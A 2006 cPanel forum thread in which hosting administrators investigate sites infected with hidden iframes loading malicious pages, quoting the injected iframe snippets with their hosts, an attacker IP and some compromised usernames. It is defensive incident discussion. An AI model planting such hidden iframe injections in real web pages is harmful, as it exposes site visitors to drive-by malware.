The Community Forums

Interact with an entire community of cPanel & WHM users!
  1. This site uses cookies. By continuing to use this site, you are agreeing to our use of cookies. Learn More.

stelaartois.ru - cpanel server hacked ?

Discussion in 'Security' started by forlinuxsupport, Nov 30, 2006.

  1. forlinuxsupport

    forlinuxsupport Well-Known Member
    PartnerNOC

    Joined:
    Dec 22, 2004
    Messages:
    386
    Likes Received:
    0
    Trophy Points:
    16
    cPanel Access Level:
    Root Administrator
    Hi

    I have foudn thsi on one of my cpanel servers and googling it has come up with 2 other servers it has happened on. One of the common things is they are all CPANEL servers.

    I have inserted spaces in the words , in case someone clicks on it :)

    < I F R A M E name='StatPage' src='h t t p : / / s t e l a a r t o i s . r u /index2.php' w i d t h=5 h e i g h t=5
    s t y l e='display:none'></IFRAME>

    It seems to really slow the servr down.. some type of doss attack when running it ?

    Anyone else had this issue. I'm busy investigating it, so I will post back here is I find anything.

    Just found out, one server chnaged the root password and that stopped them getting on. I looked in logs and cant find anyone sshing on.. hmm... puzzling.

    Regards
    Andy
     
  2. Kelmas

    Kelmas Well-Known Member

    Joined:
    Nov 6, 2006
    Messages:
    121
    Likes Received:
    0
    Trophy Points:
    16
    Location:
    Lithuania
    That is an explot that hit many HostGator servers some time ago and that iframe contained a serious virus. I suggest backing up /home/ dirs and reinstall servers.

    The problem is in PHP rendering (automatically ads iframe to all generated pages) and spreads due to IE exploit. Other browsers does not show this.
     
  3. forlinuxsupport

    forlinuxsupport Well-Known Member
    PartnerNOC

    Joined:
    Dec 22, 2004
    Messages:
    386
    Likes Received:
    0
    Trophy Points:
    16
    cPanel Access Level:
    Root Administrator
    Hey guys

    I know the exploit you are talking about and I ran the cpanel script and did the force update when that happened (about a month or so ago).

    So I'm puzzled as to how they are able to do it now...

    I'm hoping its not a new cpanel exploit. apache Logs have rotated (nice one cpanel) so I cant even look back in those.

    Regards
    Andy
     
  4. AndyReed

    AndyReed Well-Known Member
    PartnerNOC

    Joined:
    May 29, 2004
    Messages:
    2,222
    Likes Received:
    3
    Trophy Points:
    38
    Location:
    Minneapolis, MN
    Just in case, these are few of the symptoms of a server that has been compromised:

    1. Applications that suddenly don't respond as expected.
    2. Additional user accounts that you can't account for (these may be made to look like system accounts)
    3. New files or directories with unusual names.
    4. Additional network traffic that can't be traced to a particular process
    5. E-Mail from a security department implying that your server has been port scanning or sending malicious network traffic
    6. Server running significantly slower

    If you are experiencing any of these symptoms, your server has been compromised and the best solution is OS reload.
     
  5. AndyReed

    AndyReed Well-Known Member
    PartnerNOC

    Joined:
    May 29, 2004
    Messages:
    2,222
    Likes Received:
    3
    Trophy Points:
    38
    Location:
    Minneapolis, MN
    Is it cPanel exploit??? :rolleyes:
     
  6. JamesSmith

    JamesSmith Well-Known Member

    Joined:
    Sep 17, 2003
    Messages:
    185
    Likes Received:
    0
    Trophy Points:
    16
    Location:
    UK, Luton
    Some of our servers are suffering the same fate, despite everything being up to date. Some web sites on some servers have the following added to their index.php pages:

    Code:
    <iframe src="http://isecurepages.net/out.php?s_id=11" width=0 height=0></iframe>
    
    I contacted cPanel when we first noticed the problem (right at the time of the major cPanel exploit ... coincidence? I don’t think so) but they refuse to help, with the usual "we do not provide server management". What they don’t seem to grasp is that I'm not after server management, I'm after assistance with a potential problem caused by their insecure software!
     
  7. AndyReed

    AndyReed Well-Known Member
    PartnerNOC

    Joined:
    May 29, 2004
    Messages:
    2,222
    Likes Received:
    3
    Trophy Points:
    38
    Location:
    Minneapolis, MN
    Unless you can prove that your server was hacked because of their control panel, otherwise you don't have a case agianst them. It is in your best interest to take all measures to harden and secure your server. Remember that the cPanel offers web hosting software that automates the intricate workings of web hosting servers. Compared to other control panels, the cPanel is the most secure and robust control panel.
     
  8. Kelmas

    Kelmas Well-Known Member

    Joined:
    Nov 6, 2006
    Messages:
    121
    Likes Received:
    0
    Trophy Points:
    16
    Location:
    Lithuania
    You can try to search for information at HostGator Forums, guys had a hard time, but solved similar attack.
     
  9. JamesSmith

    JamesSmith Well-Known Member

    Joined:
    Sep 17, 2003
    Messages:
    185
    Likes Received:
    0
    Trophy Points:
    16
    Location:
    UK, Luton
    I have no doubt that it was because of the recent cPanel exploit as its occurred and is occurring on a number of other hosts.

    It will be interesting to see how this progresses and if the impact of it is felt further, maybe when more people are affected will someone take notice.
     
  10. dfltech

    dfltech Guest

    I was googling and found some links that had this problem as well..

    Now what concerned me was they all used cPanel server and they all are effected in late November. So it is definately not the last exploit.

    I hope that it is not the cPanel again..!!!
     
  11. Kelmas

    Kelmas Well-Known Member

    Joined:
    Nov 6, 2006
    Messages:
    121
    Likes Received:
    0
    Trophy Points:
    16
    Location:
    Lithuania
    Actually late September.
     
  12. JamesSmith

    JamesSmith Well-Known Member

    Joined:
    Sep 17, 2003
    Messages:
    185
    Likes Received:
    0
    Trophy Points:
    16
    Location:
    UK, Luton
    isecurepage code started to appear for us about a week before the cPanel exploit was announced by cPanel.

    I think we need some clarification from hostgator if their problem was the same and the line of code that was added to peoples sites - If we can see a pattern, then there’s still a problem that cPanel needs to do something about.

    The problem is, we dont know how this line of code is being added to sites.
     
  13. Kelmas

    Kelmas Well-Known Member

    Joined:
    Nov 6, 2006
    Messages:
    121
    Likes Received:
    0
    Trophy Points:
    16
    Location:
    Lithuania
    As in Hostgator's issue, these lines were added by infected PHP engine during page rendering.
     
  14. forlinuxsupport

    forlinuxsupport Well-Known Member
    PartnerNOC

    Joined:
    Dec 22, 2004
    Messages:
    386
    Likes Received:
    0
    Trophy Points:
    16
    cPanel Access Level:
    Root Administrator
    yes.. got it :)

    They had guessed 3 users ftp usernames and passwords on the server.

    Not sure how they would get those usernames.

    The ip he came from was - 209.160.65.6

    The usernames were.. so not easy to guess
    lookwhat
    paulslee
    yeschef

    I'm wondering if there is more too this.. and how they got thoese detials ...

    Might have exploited the server earlier and downloaded all usernames and passwords..

    Cheers
    Andy
     
  15. dfltech

    dfltech Guest

    No its late November... and by the way I have a friend whos site had the same iframe hack yesterday.. now he has a VPS with very few sites and cPanel.. but all other sites were intact.. So this should not have any thing to do with cPanel I suppose.

    May be a PHP application or a function...

    And regarding hostgator.. their issues was at the same time when cPanel had an exploit.. I have gone through their forums but did not fine any recent complains about the iframe hack.
     
    #15 dfltech, Dec 4, 2006
    Last edited by a moderator: Dec 5, 2006
  16. Kelmas

    Kelmas Well-Known Member

    Joined:
    Nov 6, 2006
    Messages:
    121
    Likes Received:
    0
    Trophy Points:
    16
    Location:
    Lithuania
    I have an account at Hostgator and clearly know that iframe issue was IN SEPTEMBER.

    Now getting back to the topic... It is not difficult to steal FTP logins as they are sent unencrypted. I can say very rare uses secure FTP.
     
  17. JamesSmith

    JamesSmith Well-Known Member

    Joined:
    Sep 17, 2003
    Messages:
    185
    Likes Received:
    0
    Trophy Points:
    16
    Location:
    UK, Luton
    I don’t think the passwords are being captured by anyone listening on the server or between the server + user or even on the users system. It’s more likely they gained the passwd file off the server and ran something like jack the ripper to crack the passwords.

    We've seen the same IP on all of our servers that are affected connect to the server with many different usernames and login successfully. We're currently investigating if it’s feasible to simply download the passwd file off the server with some PHP coding and then attempt to crack the passwords.
     
  18. chirpy

    chirpy Well-Known Member

    Joined:
    Jun 15, 2002
    Messages:
    13,475
    Likes Received:
    20
    Trophy Points:
    38
    Location:
    Go on, have a guess
    On most modern linux distros passwords are not stored in //etc/passwd, they're in /etc/shadow and to get at those you nearly always need a root exploit (unless your permissions on that file are FUBAR'd). I'd guess at a simple password guesser/weak password.

    Usually to capture passwords in the clear requires, again, either a root exploit on the server itself, or a packet sniffer on the same subnet as you on a seperate server that has been root comrpomised. It's unlikely, but possible.
     
  19. JamesSmith

    JamesSmith Well-Known Member

    Joined:
    Sep 17, 2003
    Messages:
    185
    Likes Received:
    0
    Trophy Points:
    16
    Location:
    UK, Luton
    On one server with 850 accounts, we believe 63 have been accessed and affected by this code change.

    So yes, it could be that all the users were using relatively weak passwords and they were guessed, along with the usernames ... or someone has been able to gain other sensetive information, as you suggest. But there is nothing sniffing on our network or the individual servers to do this. So it means cPanel has a problem or something else gathered information before cPanel patched it.
     
  20. carluk

    carluk Well-Known Member

    Joined:
    Sep 2, 2003
    Messages:
    162
    Likes Received:
    0
    Trophy Points:
    16
    Get John the ripper to test your users passwords.
     
    #20 carluk, Dec 5, 2006
    Last edited: Dec 6, 2006
Loading...

Share This Page